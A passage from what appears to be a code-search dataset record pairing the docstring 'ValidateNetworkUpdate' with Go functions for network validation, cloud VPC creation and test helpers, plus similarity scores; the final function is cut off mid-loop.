struct {\n\t\tindex int\n\t\trule *NetworkRule\n\t}\n\tseen := make(map[[sha256.Size]byte]*indexedRule, len(rules))\n\tfor iRule, rule := range rules {\n\n\t\tif rule == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\thash := sha256.New()\n\n\t\t// hash the action\n\t\tfmt.Fprintf(hash, \"%s/\", rule.Action)\n\n\t\t// hash the object\n\t\tobj := make([]string, len(rule.Object))\n\t\tfor i, subExpr := range rule.Object {\n\t\t\tcpy := append([]string{}, subExpr...)\n\t\t\tsort.Strings(cpy)\n\t\t\tobj[i] = strings.Join(cpy, \"/\")\n\t\t}\n\t\tsort.Strings(obj)\n\t\tfor _, subExpr := range obj {\n\t\t\tfmt.Fprintf(hash, \"[%s]/\", subExpr)\n\t\t}\n\n\t\t// hash the ports\n\t\tprotoPortCpy := append([]string{}, rule.ProtocolPorts...)\n\t\tfor i, port := range protoPortCpy {\n\t\t\tprotoPortCpy[i] = strings.ToLower(port)\n\t\t}\n\t\tsort.Strings(protoPortCpy)\n\t\tfor _, port := range protoPortCpy {\n\t\t\tfmt.Fprintf(hash, \"%s/\", port)\n\t\t}\n\n\t\t// check if hash was seen before\n\t\tvar digest [sha256.Size]byte\n\t\tcopy(digest[:], hash.Sum(nil))\n\t\tif prevRule, ok := seen[digest]; ok {\n\t\t\treturn makeValidationError(\n\t\t\t\tattribute,\n\t\t\t\tfmt.Sprintf(\"Duplicate network rules at the following indexes: [%d, %d]\", prevRule.index+1, iRule+1),\n\t\t\t)\n\t\t}\n\n\t\tseen[digest] = &indexedRule{index: iRule, rule: rule}\n\t}\n\n\treturn nil\n}", "func NewNetwork(cfg SourceGeneratorConfig) Sourcer {\n\treturn &Network{\n\t\tschema: []idk.Field{\n\t\t\tidk.IDField{NameVal: \"id\"}, // 0\n\t\t\tidk.IDField{NameVal: \"qos_tier\"}, // 1\n\t\t\tidk.IntField{NameVal: \"source_equip_id\"}, // 2\n\t\t\tidk.IntField{NameVal: \"dest_equip_id\"}, // 3\n\t\t\tidk.IntField{NameVal: \"data_size\"}, // 4\n\t\t\tidk.StringField{NameVal: \"data_type\"}, // 5\n\t\t\tidk.StringField{NameVal: \"customer\"}, // 6\n\t\t\tidk.IntField{NameVal: \"timestamp\"}, // 7\n\t\t},\n\t}\n}", "func (s *TransactionEvent) SetNetwork(v string) *TransactionEvent {\n\ts.Network = &v\n\treturn s\n}", "func (in *Database) DeleteNetwork(netw *types.Network) error {\n\treturn in.delete(\"network\", netw)\n}", "func (o *NetworkingProjectIpCreate) GetNetworkOk() (*string, bool) {\n\tif o == nil || o.Network == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Network, true\n}", "func ValidateNetworking(decoder runtime.Decoder, networking *core.Networking, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif networking == nil {\n\t\tallErrs = append(allErrs, field.Required(fldPath, \"networking field can't be empty for Azure shoots\"))\n\t\treturn allErrs\n\t}\n\n\tif networking.Nodes == nil {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"nodes\"), \"a nodes CIDR must be provided for Azure shoots\"))\n\t}\n\tif networking.Type != nil && *networking.Type == calicopkg.ReleaseName {\n\t\tnetworkConfig, err := decodeCalicoNetworkingConfig(decoder, networking.ProviderConfig)\n\t\tif err != nil {\n\t\t\tallErrs = append(allErrs, field.InternalError(fldPath.Child(\"providerConfig\"), err))\n\t\t} else if networkConfig.Overlay != nil && networkConfig.Overlay.Enabled {\n\t\t\tallErrs = append(allErrs, field.Forbidden(fldPath.Child(\"providerConfig\").Child(\"overlay\").Child(\"enabled\"), \"Calico overlay network is not supported on azure\"))\n\t\t}\n\t}\n\n\treturn allErrs\n}", "func verifyNetworkState(t *testing.T, tenant, network, encap, subnet, gw string, subnetLen uint, pktTag, extTag int) {\n\tnetworkID := network + \".\" + tenant\n\tnwCfg := &mastercfg.CfgNetworkState{}\n\tnwCfg.StateDriver = stateStore\n\terr := nwCfg.Read(networkID)\n\tif err != nil {\n\t\tt.Fatalf(\"Network state for %s not found. Err: %v\", networkID, err)\n\t}\n\n\t// verify network params\n\tif nwCfg.Tenant != tenant || nwCfg.NetworkName != network ||\n\t\tnwCfg.PktTagType != encap || nwCfg.SubnetIP != netutils.GetSubnetAddr(subnet, subnetLen) || nwCfg.Gateway != gw {\n\t\tt.Fatalf(\"Network state {%+v} did not match expected state\", nwCfg)\n\t}\n\n\t// verify network tags\n\tif (pktTag != 0 && nwCfg.PktTag != pktTag) ||\n\t\t(extTag != 0 && nwCfg.ExtPktTag != extTag) {\n\t\tt.Fatalf(\"Network tags %d/%d did not match expected %d/%d\",\n\t\t\tnwCfg.PktTag, nwCfg.ExtPktTag, pktTag, extTag)\n\t}\n}", "func (s stack) CreateNetwork(req abstract.NetworkRequest) (res *abstract.Network, ferr fail.Error) {\n\tnullAN := abstract.NewNetwork()\n\tif s.IsNull() {\n\t\treturn nullAN, fail.InvalidInstanceError()\n\t}\n\n\tdefer debug.NewTracer(nil, tracing.ShouldTrace(\"stack.aws\") || tracing.ShouldTrace(\"stacks.network\"), \"(%v)\", req).WithStopwatch().Entering().Exiting()\n\n\t// Check if network already there\n\tvar xerr fail.Error\n\tif _, xerr = s.rpcDescribeVpcByName(aws.String(req.Name)); xerr != nil {\n\t\tswitch xerr.(type) {\n\t\tcase *fail.ErrNotFound:\n\t\t\tdebug.IgnoreError(xerr)\n\t\t\t// continue\n\t\tdefault:\n\t\t\treturn nullAN, xerr\n\t\t}\n\t} else {\n\t\treturn nullAN, fail.DuplicateError(\"a Network/VPC named '%s' already exists\")\n\t}\n\n\t// if not, create the network/VPC\n\ttheVpc, xerr := s.rpcCreateVpc(aws.String(req.Name), aws.String(req.CIDR))\n\tif xerr != nil {\n\t\treturn nullAN, fail.Wrap(xerr, \"failed to create VPC\")\n\t}\n\n\t// wait until available status\n\tif IsOperation(theVpc, \"State\", reflect.TypeOf(\"\")) {\n\t\tretryErr := retry.WhileUnsuccessful(\n\t\t\tfunc() error {\n\t\t\t\tvpcTmp, innerXErr := s.rpcDescribeVpcByID(theVpc.VpcId)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn innerXErr\n\t\t\t\t}\n\t\t\t\tif aws.StringValue(vpcTmp.State) != \"available\" {\n\t\t\t\t\treturn fail.NewError(\"not ready\")\n\t\t\t\t}\n\t\t\t\treturn nil\n\t\t\t},\n\t\t\ttemporal.GetMinDelay(),\n\t\t\ttemporal.GetDefaultDelay(),\n\t\t)\n\t\tif retryErr != nil {\n\t\t\tswitch retryErr.(type) {\n\t\t\tcase *retry.ErrStopRetry:\n\t\t\t\treturn nullAN, fail.Wrap(fail.Cause(retryErr), \"stopping retries\")\n\t\t\tcase *fail.ErrTimeout:\n\t\t\t\treturn nullAN, fail.Wrap(fail.Cause(retryErr), \"timeout\")\n\t\t\tdefault:\n\t\t\t\treturn nullAN, retryErr\n\t\t\t}\n\t\t}\n\t}\n\n\tdefer func() {\n\t\tif ferr != nil && !req.KeepOnFailure {\n\t\t\tif theVpc != nil {\n\t\t\t\tderr := s.DeleteNetwork(aws.StringValue(theVpc.VpcId))\n\t\t\t\tif derr != nil {\n\t\t\t\t\t_ = ferr.AddConsequence(derr)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\n\tgw, xerr := s.rpcCreateInternetGateway()\n\tif xerr != nil {\n\t\treturn nullAN, fail.Wrap(xerr, \"failed to create internet gateway\")\n\t}\n\n\tif xerr = s.rpcAttachInternetGateway(theVpc.VpcId, gw.InternetGatewayId); xerr != nil {\n\t\treturn nullAN, fail.Wrap(xerr, \"failed to attach internet gateway to Network\")\n\t}\n\n\tdefer func() {\n\t\tif ferr != nil && !req.KeepOnFailure {\n\t\t\tif derr := s.rpcDetachInternetGateway(theVpc.VpcId, gw.InternetGatewayId); derr != nil {\n\t\t\t\t_ = ferr.AddConsequence(normalizeError(derr))\n\t\t\t}\n\t\t}\n\t}()\n\n\ttables, xerr := s.rpcDescribeRouteTables(aws.String(\"vpc-id\"), []*string{theVpc.VpcId})\n\tif xerr != nil {\n\t\treturn nullAN, xerr\n\t}\n\tif len(tables) < 1 {\n\t\treturn nullAN, fail.InconsistentError(\"no Route Tables\")\n\t}\n\n\tif xerr = s.rpcCreateRoute(gw.InternetGatewayId, tables[0].RouteTableId, aws.String(\"0.0.0.0/0\")); xerr != nil {\n\t\treturn nullAN, fail.Wrap(xerr, \"failed to create route\")\n\t}\n\n\tdefer func() {\n\t\tif ferr != nil && !req.KeepOnFailure {\n\t\t\tif derr := s.rpcDeleteRoute(tables[0].RouteTableId, aws.String(\"0.0.0.0/0\")); derr != nil {\n\t\t\t\t_ = ferr.AddConsequence(normalizeError(derr))\n\t\t\t}\n\t\t}\n\t}()\n\n\tanet := abstract.NewNetwork()\n\tanet.ID = aws.StringValue(theVpc.VpcId)\n\tanet.Name = req.Name\n\tanet.CIDR = req.CIDR\n\tanet.DNSServers = req.DNSServers\n\n\t// Make sure we log warnings\n\t_ = anet.OK()\n\n\treturn anet, nil\n}", "func (s *TokenIdentifier) SetNetwork(v string) *TokenIdentifier {\n\ts.Network = &v\n\treturn s\n}", "func NewNetwork(spec *types.NetworkSpec) (Network, error) {\n\tn := &network{\n\t\tname: spec.Name,\n\t\ttyp: spec.Type,\n\t\tuseNAT: spec.UseNAT,\n\t}\n\tif len(spec.Address) > 0 {\n\t\taddr, err := netlink.ParseAddr(spec.Address)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tn.addr = addr\n\t}\n\n\treturn n, nil\n}", "func (a Relayer) Validate() error {\n\treturn validation.ValidateStruct(&a,\n\t\tvalidation.Field(&a.Address, validation.Required),\n\t)\n}", "func (s *TokenFilter) SetNetwork(v string) *TokenFilter {\n\ts.Network = &v\n\treturn s\n}", "func ReleaseNetwork(ec2InstanceID, network string) bool {\n\tlog.Printf(\"debug: releasing %s from %s\", network, ec2InstanceID)\n\tid := fmt.Sprintf(\"%s_%s\", ec2InstanceID, network)\n\trow := connection.QueryRow(`\n\tINSERT INTO network_list\n\t(id, ec2_instance_id)\n\tVALUES ($1, $2)\n\t`, id, ec2InstanceID)\n\tif row == nil {\n\t\tlog.Printf(\"warning: failed to create network list entry\")\n\t\treturn false\n\t}\n\treturn true\n}", "func (c *C7000) Network(cfg *cfgresources.Network) (bool, error) {\n\treturn false, nil\n}", "func (c *TestClient) DeleteNetwork(project, name string) error {\n\tif c.DeleteNetworkFn != nil {\n\t\treturn c.DeleteNetworkFn(project, name)\n\t}\n\treturn c.client.DeleteNetwork(project, name)\n}", "func (m *ManagerNetworkProtocol100ManagerNetworkProtocol) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateHTTP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateHTTPS(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateIPMI(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateKVMIP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSNMP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSSDP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSSH(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStatus(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTelnet(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateVirtualMedia(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (o *Transfer) GetNetworkOk() (*TransferNetwork, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Network, true\n}", "func (s *TransactionOutputItem) SetNetwork(v string) *TransactionOutputItem {\n\ts.Network = &v\n\treturn s\n}", "func ValidateCIDR(attribute string, network string) error {\n\n\tif _, _, err := net.ParseCIDR(network); err == nil {\n\t\treturn nil\n\t}\n\n\treturn makeValidationError(attribute, fmt.Sprintf(\"Attribute '%s' must be a CIDR\", attribute))\n}", "func TestNetworkAddDelete(t *testing.T) {\n\t// Basic vlan network\n\tcheckCreateNetwork(t, false, \"default\", \"contiv\", \"vlan\", \"10.1.1.1/24\", \"10.1.1.254\", 1)\n\tverifyNetworkState(t, \"default\", \"contiv\", \"vlan\", \"10.1.1.1\", \"10.1.1.254\", 24, 1, 0)\n\tcheckDeleteNetwork(t, false, \"default\", \"contiv\")\n\n\t// Basic Vxlan network\n\tcheckCreateNetwork(t, false, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1/16\", \"10.1.1.254\", 1)\n\tverifyNetworkState(t, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1\", \"10.1.1.254\", 16, 1, 1)\n\tcheckDeleteNetwork(t, false, \"default\", \"contiv\")\n\n\t// Basic IP range network checks\n\tcheckCreateNetwork(t, false, \"default\", \"contiv\", \"vxlan\", \"10.1.1.10-20/24\", \"10.1.1.254\", 1)\n\tverifyNetworkState(t, \"default\", \"contiv\", \"vxlan\", \"10.1.1.10\", \"10.1.1.254\", 24, 1, 1)\n\tcheckDeleteNetwork(t, false, \"default\", \"contiv\")\n\n\t// Try network create with invalid network range\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1-70/26\", \"10.1.1.63\", 1)\n\n\t// Try network create with invalid subnet length\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1/32\", \"10.1.1.1\", 1)\n\n\t// try creating network without tenant\n\tcheckCreateNetwork(t, true, \"tenant1\", \"contiv\", \"vxlan\", \"10.1.1.1/24\", \"10.1.1.254\", 1)\n\n\t// try invalid encap\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vvvv\", \"10.1.1.1/24\", \"10.1.1.254\", 1)\n\n\t// try invalid pkt tags\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vlan\", \"10.1.1.1/24\", \"10.1.1.254\", 5000)\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1/24\", \"10.1.1.254\", 20000)\n\n\t// Try gateway outside the network\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1/24\", \"10.1.2.254\", 1)\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.65-70/26\", \"10.1.1.1\", 2)\n\n\t// Try deleting a non-existing network\n\tcheckDeleteNetwork(t, true, \"default\", \"contiv\")\n}", "func NewDeleteNetwork(objRef string) *DeleteNetAPI {\n\tthis := new(DeleteNetAPI)\n\tthis.BaseAPI = api.NewBaseAPI(http.MethodDelete, fmt.Sprintf(\"%s/%s\", wapiVersion, objRef), nil, new(string))\n\treturn this\n}", "func ValidateNetworkOrHostnameList(attribute string, networks []string) error {\n\n\tif len(networks) == 0 {\n\t\treturn makeValidationError(attribute, fmt.Sprintf(\"Attribute '%s' must not be empty\", attribute))\n\t}\n\n\treturn ValidateOptionalNetworkOrHostnameList(attribute, networks)\n}", "func (o RegionNetworkEndpointGroupOutput) Network() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *RegionNetworkEndpointGroup) pulumi.StringPtrOutput { return v.Network }).(pulumi.StringPtrOutput)\n}", "func MustParseNet(n string) *net.IPNet {\n\t_, parsedNet, err := net.ParseCIDR(n)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn parsedNet\n}", "func (c NetworkLoadBalancerConfiguration) validate() error {\n\tif c.IsEmpty() {\n\t\treturn nil\n\t}\n\tif err := c.Listener.validate(); err != nil {\n\t\treturn err\n\t}\n\tif err := c.Aliases.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"alias\": %w`, err)\n\t}\n\tif !c.Aliases.IsEmpty() {\n\t\tfor _, advancedAlias := range c.Aliases.AdvancedAliases {\n\t\t\tif advancedAlias.HostedZone != nil {\n\t\t\t\treturn fmt.Errorf(`\"hosted_zone\" is not supported for Network Load Balancer`)\n\t\t\t}\n\t\t}\n\t}\n\tfor idx, listener := range c.AdditionalListeners {\n\t\tif err := listener.validate(); err != nil {\n\t\t\treturn fmt.Errorf(`validate \"additional_listeners[%d]\": %w`, idx, err)\n\t\t}\n\t}\n\treturn nil\n}", "func (m *containerNetworkManager) VerifyNetworkOptions(_ context.Context) error {\n\t// TODO: check host OS, not client-side OS.\n\tif runtime.GOOS != \"linux\" {\n\t\treturn errors.New(\"container networking mode is currently only supported on Linux\")\n\t}\n\n\tif m.netOpts.NetworkSlice != nil && len(m.netOpts.NetworkSlice) > 1 {\n\t\treturn errors.New(\"conflicting options: only one network specification is allowed when using '--network=container:<container>'\")\n\t}\n\n\tnonZeroParams := nonZeroMapValues(map[string]interface{}{\n\t\t\"--hostname\": m.netOpts.Hostname,\n\t\t\"--mac-address\": m.netOpts.MACAddress,\n\t\t// NOTE: an empty slice still counts as a non-zero value so we check its length:\n\t\t\"-p/--publish\": len(m.netOpts.PortMappings) != 0,\n\t\t\"--dns\": len(m.netOpts.DNSServers) != 0,\n\t\t\"--add-host\": len(m.netOpts.AddHost) != 0,\n\t})\n\n\tif len(nonZeroParams) != 0 {\n\t\treturn fmt.Errorf(\"conflicting options: the following arguments are not supported when using `--network=container:<container>`: %s\", nonZeroParams)\n\t}\n\n\treturn nil\n}", "func (net *NetworkCreateInput) CreateNetwork() (CreateNetworkResponse, error) {\n\n\tif status := support.DoesCloudSupports(strings.ToLower(net.Cloud.Name)); status != true {\n\t\treturn CreateNetworkResponse{}, fmt.Errorf(common.DefaultCloudResponse + \"CreateNetwork\")\n\t}\n\n\tswitch strings.ToLower(net.Cloud.Name) {\n\tcase \"aws\":\n\n\t\t// Gets the establish session so that it can carry out the process in cloud\n\t\tsess := (net.Cloud.Client).(*session.Session)\n\n\t\t//authorizing to request further\n\t\tauthinpt := auth.EstablishConnectionInput{Region: net.Cloud.Region, Resource: \"ec2\", Session: sess}\n\n\t\t// Fetching all the networks across cloud aws\n\t\tnetworkin := new(awsnetwork.NetworkCreateInput)\n\t\tnetworkin.Name = net.Name\n\t\tnetworkin.VpcCidr = net.VpcCidr\n\t\tnetworkin.SubCidrs = net.SubCidr\n\t\tnetworkin.Type = net.Type\n\t\tnetworkin.Ports = net.Ports\n\t\tnetworkin.GetRaw = net.Cloud.GetRaw\n\t\tresponse, netErr := networkin.CreateNetwork(authinpt)\n\t\tif netErr != nil {\n\t\t\treturn CreateNetworkResponse{}, netErr\n\t\t}\n\t\treturn CreateNetworkResponse{AwsResponse: response}, nil\n\n\tcase \"azure\":\n\t\treturn CreateNetworkResponse{}, fmt.Errorf(common.DefaultAzResponse)\n\tcase \"gcp\":\n\t\treturn CreateNetworkResponse{}, fmt.Errorf(common.DefaultGcpResponse)\n\tcase \"openstack\":\n\t\treturn CreateNetworkResponse{}, fmt.Errorf(common.DefaultOpResponse)\n\tdefault:\n\t\treturn CreateNetworkResponse{}, fmt.Errorf(common.DefaultCloudResponse + \"CreateNetwork\")\n\t}\n}", "func (o *NetworkingProjectIpCreate) SetNetwork(v string) {\n\to.Network = &v\n}", "func (s *Transaction) SetNetwork(v string) *Transaction {\n\ts.Network = &v\n\treturn s\n}", "func validNetworks(nets []string) bool {\n\tfor _, net := range nets {\n\t\tif strings.Count(net, \"[\") != strings.Count(net, \"]\") {\n\t\t\t// unbalanced groups.\n\t\t\treturn false\n\t\t}\n\n\t\tnet = strings.TrimPrefix(net, \"!\")\n\t\t// If this network is a grouping, check the inner group.\n\t\tif strings.HasPrefix(net, \"[\") || strings.Contains(net, \",\") {\n\t\t\tif validNetworks(strings.Split(strings.Trim(net, \"[]\"), \",\")) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t\tswitch {\n\t\tcase net == \"any\":\n\t\t\tcontinue\n\t\tcase strings.HasPrefix(net, \"$\"):\n\t\t\tcontinue\n\t\tcase !validNetwork(net):\n\t\t\treturn false\n\t\t}\n\t}\n\treturn true\n}", "func NewNetwork() *Network {\n\tnet := &Network{\n\t\tvms: make(map[int]*intcode.VM),\n\t\tmsgs: make(map[int]chan int),\n\t\tpackets: make(chan packet, 128),\n\t}\n\tnet.nat = newNAT(net)\n\treturn net\n}", "func ValidateName(name string, netType string) error {\n\tdriverFunc, ok := drivers[netType]\n\tif !ok {\n\t\treturn ErrUnknownDriver\n\t}\n\n\tn := driverFunc()\n\tn.init(nil, 0, name, netType, \"\", nil, \"Unknown\")\n\n\terr := n.ValidateName(name)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Network name invalid\")\n\t}\n\n\treturn nil\n}", "func (d *Driver) ensureNetwork() error {\n\tconn, err := getConnection()\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"getting libvirt connection\")\n\t}\n\tdefer conn.Close()\n\n\t// network: default\n\n\t// Start the default network\n\t// It is assumed that the libvirt/kvm installation has already created this network\n\tlog.Infof(\"Ensuring network %s is active\", defaultNetworkName)\n\tif err := setupNetwork(conn, defaultNetworkName); err != nil {\n\t\treturn err\n\t}\n\n\t// network: private\n\n\t// Start the private network\n\tlog.Infof(\"Ensuring network %s is active\", d.PrivateNetwork)\n\tif err := setupNetwork(conn, d.PrivateNetwork); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (n *Network) Close() error {\n\tscopes.Framework.Infof(\"Closing Docker network %s (ID=%s)\", n.Name, n.id)\n\treturn n.dockerClient.NetworkRemove(context.Background(), n.id)\n}", "func ValidateNetworkStatusUpdate(newStatus, oldStatus extensionsv1alpha1.NetworkStatus) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func ValidateCloudNetworkQueryEntity(q *CloudNetworkQuery) error {\n\n\tif q.SourceIP != \"\" && q.DestinationIP != \"\" {\n\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", fmt.Sprintf(\"'sourceIP:' %s and 'destinationIP:' %s cannot be set at the same time\", q.SourceIP, q.DestinationIP))\n\t}\n\n\temptySourceSelector := IsCloudNetworkQueryFilterEmpty(q.SourceSelector)\n\n\tif q.SourceIP != \"\" && !emptySourceSelector {\n\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'sourceIP' and 'sourceSelector' cannot be set at the same time\")\n\t}\n\n\tif q.SourceIP == \"\" && emptySourceSelector {\n\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'sourceIP' and 'sourceSelector' cannot be empty at the same time\")\n\t}\n\n\tif q.SourceIP != \"\" {\n\t\tisPrivate, err := IsAddressPrivate(q.SourceIP)\n\t\tif err != nil {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'sourceIP' must be a valid IP address\")\n\t\t}\n\t\tif isPrivate {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'sourceIP' must be a public IP address\")\n\t\t}\n\t}\n\n\tif q.DestinationIP != \"\" {\n\t\tisPrivate, err := IsAddressPrivate(q.DestinationIP)\n\t\tif err != nil {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'destinationIP' must be a valid IP address\")\n\t\t}\n\t\tif isPrivate {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'destinationIP' must be a public IP address\")\n\t\t}\n\t}\n\n\tif q.SourceIP == \"\" && q.DestinationIP == \"\" && len(q.ExcludedNetworks) != 0 {\n\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'excludedNetworks' is only valid when source or destination IP are defined\")\n\t}\n\n\temptyDestinationSelector := IsCloudNetworkQueryFilterEmpty(q.DestinationSelector)\n\n\tif q.DestinationIP != \"\" && !emptyDestinationSelector {\n\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'destinationIP' and 'destinationSelector' cannot be set at the same time\")\n\t}\n\n\tif q.DestinationIP == \"\" && emptyDestinationSelector {\n\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"'destinationIP' and 'destinationSelector' cannot be empty at the same time\")\n\t}\n\n\tif q.SourceSelector != nil {\n\t\tif err := ValidateCloudNetworkQueryFilter(\"sourceSelector\", q.SourceSelector); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif q.DestinationSelector != nil {\n\t\tif err := ValidateCloudNetworkQueryFilter(\"destinationSelector\", q.DestinationSelector); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif q.SourceIP == \"\" && q.DestinationIP == \"\" {\n\t\tif q.SourceSelector != nil && len(q.SourceSelector.VPCIDs) != 1 {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"a single source VPC must be provided for all East/West queries\")\n\t\t}\n\t\tif q.DestinationSelector != nil && len(q.DestinationSelector.VPCIDs) != 1 {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"a single destination VPC must be provided for all East/West queries\")\n\t\t}\n\t}\n\n\tif q.Type == CloudNetworkQueryTypeNetworkPath {\n\t\tif len(q.SourceIP) != 0 && len(q.DestinationSelector.ObjectIDs) != 1 {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"Only one entity (interface/instance) must be selected for the destination selector for network path queries\")\n\t\t}\n\n\t\tif len(q.DestinationIP) != 0 && len(q.SourceSelector.ObjectIDs) != 1 {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"Only one entity (interface/instance) must be selected for the source selector for network path queries\")\n\t\t}\n\n\t\tif len(q.SourceIP) == 0 && len(q.SourceSelector.ObjectIDs) != 1 {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"Only one entity (interface/instance) must be selected for the source selector for network path queries\")\n\t\t}\n\n\t\tif len(q.DestinationIP) == 0 && len(q.DestinationSelector.ObjectIDs) != 1 {\n\t\t\treturn makeValidationError(\"Entity CloudNetworkQuery\", \"Only one entity (interface/instance) must be selected for the source selector for network path queries\")\n\t\t}\n\t}\n\n\treturn nil\n}", "func (mr *MockHostMockRecorder) Network() *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"Network\", reflect.TypeOf((*MockHost)(nil).Network))\n}" ]
[ "0.73155195", "0.7186104", "0.6923285", "0.6841164", "0.6532549", "0.6366392", "0.6291432", "0.6251806", "0.6238205", "0.62232083", "0.6216633", "0.6098777", "0.60969937", "0.6080908", "0.60757625", "0.60336506", "0.59988767", "0.59749514", "0.5909168", "0.59000635", "0.5844688", "0.58245397", "0.58042496", "0.5728412", "0.56720096", "0.5656339", "0.5651296", "0.56244177", "0.5596678", "0.5559719", "0.55464864", "0.5507128", "0.5492797", "0.5471758", "0.54461503", "0.5435882", "0.5404875", "0.54043466", "0.53768027", "0.53263927", "0.53024465", "0.52799016", "0.527966", "0.5273452", "0.5263361", "0.52530944", "0.52452487", "0.5244959", "0.5237663", "0.5220294", "0.5197089", "0.51903546", "0.515743", "0.512976", "0.5118042", "0.51118267", "0.51035905", "0.50865716", "0.50858676", "0.50844103", "0.5084251", "0.5078336", "0.5075536", "0.50587153", "0.505058", "0.5049898", "0.50467736", "0.5035989", "0.5032698", "0.5031565", "0.50147736", "0.50022984", "0.4994861", "0.49922067", "0.49874148", "0.4985848", "0.49819186", "0.49808574", "0.49740252", "0.49712792", "0.49655446", "0.49610403", "0.4954516", "0.49505135", "0.4950305", "0.49500287", "0.49466214", "0.49446306", "0.493883", "0.49344143", "0.49340096", "0.49314922", "0.49131206", "0.4910726", "0.4907615", "0.49022892", "0.48992565", "0.48972479", "0.48966804", "0.48965275" ]
0.722179
1
ValidateNetworkUpdate validates a Network object before an update.
func ValidateNetworkUpdate(new, old *extensionsv1alpha1.Network) field.ErrorList { allErrs := field.ErrorList{} allErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&new.ObjectMeta, &old.ObjectMeta, field.NewPath("metadata"))...) allErrs = append(allErrs, ValidateNetworkSpecUpdate(&new.Spec, &old.Spec, new.DeletionTimestamp != nil, field.NewPath("spec"))...) allErrs = append(allErrs, ValidateNetwork(new)...) return allErrs }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (n *Network) ValidateUpdate(old runtime.Object) error {\n\tvar allErrors field.ErrorList\n\toldNetwork := old.(*Network)\n\n\tnetworklog.Info(\"validate update\", \"name\", n.Name)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Validate()...)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Spec.NetworkConfig.ValidateUpdate(&oldNetwork.Spec.NetworkConfig)...)\n\n\t// maximum allowed nodes with different name\n\tvar maxDiff int\n\t// all old nodes names\n\toldNodesNames := map[string]bool{}\n\t// nodes count in the old network spec\n\toldNodesCount := len(oldNetwork.Spec.Nodes)\n\t// nodes count in the new network spec\n\tnewNodesCount := len(n.Spec.Nodes)\n\t// nodes with different names than the old spec\n\tdifferentNodes := map[string]int{}\n\n\tif newNodesCount > oldNodesCount {\n\t\tmaxDiff = newNodesCount - oldNodesCount\n\t}\n\n\tfor _, node := range oldNetwork.Spec.Nodes {\n\t\toldNodesNames[node.Name] = true\n\t}\n\n\tfor i, node := range n.Spec.Nodes {\n\t\tif exists := oldNodesNames[node.Name]; !exists {\n\t\t\tdifferentNodes[node.Name] = i\n\t\t}\n\t}\n\n\tif len(differentNodes) > maxDiff {\n\t\tfor nodeName, i := range differentNodes 